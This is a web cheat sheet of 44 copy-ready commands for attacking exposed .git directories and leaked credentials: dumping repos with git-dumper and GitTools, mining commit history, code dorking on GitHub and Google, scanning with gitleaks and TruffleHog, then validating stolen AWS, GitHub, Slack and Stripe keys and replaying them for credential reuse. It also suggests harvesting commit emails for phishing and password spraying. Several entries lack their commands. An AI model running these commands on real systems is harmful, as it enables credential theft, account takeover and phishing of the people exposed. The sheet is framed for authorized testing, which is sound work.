Exposed .git Recon Cheat Sheet

Find and exploit exposed .git directories with git-dumper, mine commit history for secrets, and hunt leaked credentials with GitHub dorking, gitleaks, and TruffleHog. (44 payloads)

Try it interactively with the Secret Scanner

Detecting an Exposed .git

(7)

curl -s -o /dev/null -w "%{http_code}" https://example.com/.git/HEAD

Quickest check for an exposed repo. A 200 returning 'ref: refs/heads/main' (not a 404 or the SPA index page) means the .git directory is web-readable.Inspect the body, not just the status — soft 404s return 200

curl -s https://example.com/.git/config

Dumps the repo config. Leaks the [remote "origin"] URL (often a private GitHub/GitLab path or embedded creds), branch names, and submodule references.Reveals where the real source lives

curl -s https://example.com/.git/logs/HEAD

The reflog: one line per commit/checkout with author name, email, timestamp, and old/new SHA-1s. Gives you commit hashes to fetch even when directory listing is off.Goldmine of object hashes + author PII

curl -s https://example.com/.git/ | grep -i 'index of'

If directory autoindexing is on, the whole .git tree is browsable — grab objects, packs, and refs by hand. Most servers disable listing, so fall back to known-path fetching.Directory listing enabled = trivial dump

nuclei -u https://example.com -t http/exposures/configs/git-config.yaml

Nuclei template that fingerprints exposed .git/config at scale. Run across a host list to triage many targets before committing to a full dump.Mass-detection across scope

for h in $(cat hosts.txt); do echo -n "$h "; curl -sk -o /dev/null -w "%{http_code}\n" "https://$h/.git/HEAD"; done

Bulk one-liner to sweep a subdomain list for exposed repos. Pipe through 'grep 200' to keep only live hits worth dumping.Pair with subdomain enumeration output

curl -s https://example.com/.svn/wc.db -o wc.db && sqlite3 wc.db 'select local_relpath from NODES;'

Same class of bug for Subversion — .svn/wc.db (SVN 1.7+) or .svn/entries lists every tracked file path for reconstruction. Also check .hg/ for Mercurial and .bzr/ for Bazaar.Don't forget non-git VCS metadata

Dumping & Reconstructing the Repo

(8)

git-dumper https://example.com/.git/ ./loot

The standard tool. Parses .git/config, refs, and packed-refs, walks all reachable objects over HTTP (even with directory listing disabled), rebuilds .git locally, then runs 'git checkout' to materialize the working tree.pip install git-dumper

git-dumper --threads 12 --retry 3 https://example.com/.git/ ./loot

Tune concurrency and retries for flaky or rate-limited origins. More threads speeds object fetching; retries handle transient 5xx from a struggling backend.Throttle to avoid tripping WAF/rate limits

GitTools/Dumper/gitdumper.sh https://example.com/.git/ ./loot

The original GitTools Dumper. Brute-forces common object/ref paths and downloads them. Use when git-dumper chokes; its Extractor handles partial/corrupt dumps.Classic fallback dumper

GitTools/Extractor/extractor.sh ./loot ./extracted

Reconstructs every commit into numbered folders (0-<sha>, 1-<sha>, ...) even when the working tree won't cleanly check out. Each folder is a full snapshot — diff them to track how secrets entered and left the code.Recovers history when checkout fails

cd loot && git checkout -- . && git status

After a dump, force-restore the working tree from the recovered index, then list what's tracked. Missing/blob-not-found errors mean the dump is incomplete — fetch the missing object hashes manually.Materialize source from rebuilt .git

git fsck --full --unreachable --dangling

Inside a dumped repo, surface dangling and unreachable objects — orphaned commits and blobs not pointed to by any branch. These often hold deleted files (configs, keys) that were git-added then removed.Unreferenced objects = deleted secrets

git cat-file -p <blob-sha>

Print the raw content of any object by hash. Combine with 'git rev-list --objects --all' to map blob hashes to filenames and pull individual files from a partial dump.Read objects directly when checkout is broken

curl -s https://example.com/.git/index | git ls-files --stage --debug || python3 -c "import dulwich"

When only .git/index is reachable, parse it to list every tracked file path and its blob SHA, then fetch each blob at /.git/objects/<2>/<38>. Tools like 'GitHack' automate exactly this index-driven recovery.Index-driven recovery without listing

Mining Commit History for Secrets

(7)

Grep every diff across all branches and history. Secrets removed in a later commit still live in old diffs — current HEAD being clean means nothing.HEAD is clean ≠ history is clean

git log -p -S 'AKIA' --all

The 'pickaxe': -S finds commits that changed the number of occurrences of a string, so it pinpoints exactly when an AWS key (or any literal) was added or deleted. Use -G for a regex variant.Locate the add/remove commit precisely

List files that were deleted (diff-filter=D) — devs frequently commit a secret, realize the mistake, and 'git rm' it. The blob is still recoverable from history.Deleted sensitive files are still in objects

git show <sha>:path/to/.env

Print the contents of a specific file as it existed at a given commit, even if that file was later deleted or rewritten. Pair with the pickaxe SHA to extract the leaked version.Time-travel to the file's leaked state

Map every object across all refs to its path. Surfaces sensitive blobs (key stores, DB backups, archives) that may not appear in any current tree but are still fetchable by hash.Full object-to-path inventory

git for-each-ref --format='%(refname)' | grep -E 'stash|original|backup' ; git stash list

Check stashes, refs/original/* (left by filter-branch/BFG history rewrites), and odd refs. A 'cleaned' repo often still has the secret in refs/original/ or a forgotten stash.Rewrites frequently leave the original behind

git log --all --source --remotes --pretty=format:'%h %an <%ae> %s'

Enumerate author/committer names and emails across every commit and remote-tracking branch. Builds an employee/contractor map for OSINT, phishing pretext, and password-spray username lists.History doubles as a people-and-email dump

GitHub / GitLab Code Dorking

(7)

org:exampleorg AWS_SECRET_ACCESS_KEY

Search an authorized org's repos for hardcoded AWS secrets. GitHub code search only covers default branches of indexed repos, so it complements (not replaces) a full history scan.Scope to org:/repo: you're permitted to test

org:exampleorg filename:.env DB_PASSWORD

Combine the filename: filter with a body term to find committed .env files leaking database passwords. Swap in .npmrc, .pypirc, .dockercfg, or .git-credentials for other credential stores.Target credential-bearing filenames

org:exampleorg path:**/*.yml "password:" OR "client_secret:"

Modern GitHub code-search syntax (path:, boolean OR) scoped to YAML CI/config files that embed secrets — common in .github/workflows, k8s manifests, and Ansible vars.CI/CD and config files are secret-heavy

"@example.com" "-----BEGIN OPENSSH PRIVATE KEY-----"

Pivot on a corporate email domain plus a key header to find employees who pushed private keys to their personal/public repos — code that never shows up under the company org.Catch leaks in personal repos, not just the org

github-dorks -d example.com (or trufflehog / gitrob across org repos)

Automate the dork list — github-dorks and gitrob iterate a curated set of credential patterns over an org or user's repos via the API, returning ranked hits with file URLs.Batch the manual dorks via API

https://github.com/search?q=org%3Aexampleorg+xoxb-&type=code

URL-encoded code-search for Slack bot tokens (xoxb-). Adapt the prefix: 'sk_live_' (Stripe), 'ghp_' (GitHub PAT), 'AIza' (Google API), 'eyJ' (JWT), 'glpat-' (GitLab PAT).High-signal token prefixes

site:gist.github.com "example.com" password

Google-dork public Gists and pastebins — devs paste configs and logs there for debugging and forget them. Also try site:pastebin.com and site:gitlab.com for the same target.Gists/pastes escape repo scanning

Automated Secret Scanning — gitleaks & TruffleHog

(8)

gitleaks detect --source ./loot --report-format json --report-path gitleaks.json

Run gitleaks over a dumped/cloned repo. By default it scans the full git history (every commit and diff), matching 150+ built-in regex rules for keys, tokens, and high-entropy strings.Scans all of history by default

gitleaks detect --source . --log-opts="--all --full-history" -v

Force gitleaks to traverse every branch and the complete history (not just reachable-from-HEAD), with verbose output showing the exact commit, file, line, and rule for each finding.Cover all branches + verbose triage

trufflehog git file://./loot --only-verified

TruffleHog scans the repo and, crucially, live-validates each candidate against the provider's API — so --only-verified returns just keys confirmed ACTIVE, killing the false-positive noise gitleaks alone produces.Verification = active keys, not dead strings

trufflehog github --org=exampleorg --only-verified --json

Point TruffleHog straight at an org over the API to scan every repo (and optionally issues/PR comments) without cloning. JSON output is easy to feed into a findings pipeline.Org-wide scan, no local clone needed

trufflehog git file://. --since-commit HEAD~50 --branch main

Scope a scan to a commit range or single branch for speed on huge monorepos, or to focus on recently introduced secrets during a time-boxed engagement.Bound the scan for large repos

gitleaks detect --source . --no-git

Treat the target as a plain directory of files (skip git history) — useful for scanning a checked-out webroot, a decompiled app, or backups where no .git exists.Scan loose files, not a repo

noseyparker scan ./loot && noseyparker report

NoseyParker is a fast alternative that scans history with rules + entropy and deduplicates matches across commits, so one leaked key shared by 200 commits reports once. Handy on large dumps where gitleaks is noisy.Dedup-focused alternative scanner

git secrets --scan-history

AWS Labs git-secrets, history mode — lightweight, focused on AWS keys plus custom regexes. Often the same hook teams add as a pre-commit guard, so it tells you what defenders are (and aren't) blocking.Mirrors common pre-commit defenses

Validating & Weaponizing Found Secrets

(7)

aws sts get-caller-identity --profile loot

Confirm a recovered AWS key pair is live and resolve the account ID, user/role ARN, and account alias — your first move before enumerating permissions or pivoting into the cloud.Set the key in ~/.aws/credentials as [loot]

curl -s https://api.github.com/user -H "Authorization: Bearer ghp_xxxx"

Validate a GitHub PAT and read the owning account; check the x-oauth-scopes response header to see exactly what the token can do (repo, admin:org, workflow, etc.).Response header reveals token scopes

curl -s https://slack.com/api/auth.test -d token=xoxb-xxxx

Test a Slack token and reveal the workspace, team, and bot identity it belongs to. A valid response ('ok':true) confirms an active foothold into internal chat/data.Maps the token to a workspace

curl -s https://api.stripe.com/v1/account -u sk_live_xxxx:

Validate a live Stripe secret key and pull the connected account/business details — a high-impact finding demonstrating access to real payment infrastructure.sk_live_ = production payments access

trufflehog --help | grep -A2 detectors # 800+ verifiers built in

Rather than hand-rolling a curl per provider, lean on TruffleHog's 800+ detectors to verify the credential type for you — it knows the right API endpoint for each key format.Offload validation to TruffleHog detectors

jq -r '.foundSecrets[].secret' gitleaks.json | sort -u > secrets.txt

Normalize scanner output into a deduplicated wordlist of every leaked credential, then replay it against discovered login/SSH/DB endpoints (creds get reused across services).Leaked secrets feed credential reuse

Document: commit SHA, file path, key prefix, scopes, validation timestamp

For the report, capture where each secret lived (commit + path), what it is, its verified privileges, and proof it was active — redact the raw value and recommend immediate rotation, not just deletion (history persists).Rotation, not deletion — the blob survives

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

Google Dorking Cheat Sheet Subdomain Enumeration Cheat Sheet OSINT & Reconnaissance Cheat Sheet

Frequently asked questions

What is the Exposed .git Recon Cheat Sheet?+

It's a quick-reference collection of 44 Git Recon payloads for testing Exposed .git Recon vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Git Recon payloads?+

Copy any payload straight into your authorized test, or use the Secret Scanner to apply them interactively. Only test systems you have explicit permission to assess.

Are these Git Recon payloads free to use?+

Yes — this cheat sheet and all Git Recon payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Exposed .git Recon Cheat Sheet?+

How do I use these Git Recon payloads?+

Copy any payload straight into your authorized test, or use the Secret Scanner to apply them interactively. Only test systems you have explicit permission to assess.

Are these Git Recon payloads free to use?+

Yes — this cheat sheet and all Git Recon payloads are completely free, with no account required. Everything runs in your browser.

Exposed .git Recon Cheat Sheet

Detecting an Exposed .git

Dumping & Reconstructing the Repo

Mining Commit History for Secrets

GitHub / GitLab Code Dorking

Automated Secret Scanning — gitleaks & TruffleHog

Validating & Weaponizing Found Secrets

Related Tools

Related Cheat Sheets

Frequently asked questions

Exposed .git Recon Cheat Sheet

Detecting an Exposed .git

Dumping & Reconstructing the Repo

Mining Commit History for Secrets

GitHub / GitLab Code Dorking

Automated Secret Scanning — gitleaks & TruffleHog

Validating & Weaponizing Found Secrets

Related Tools

Related Cheat Sheets

Frequently asked questions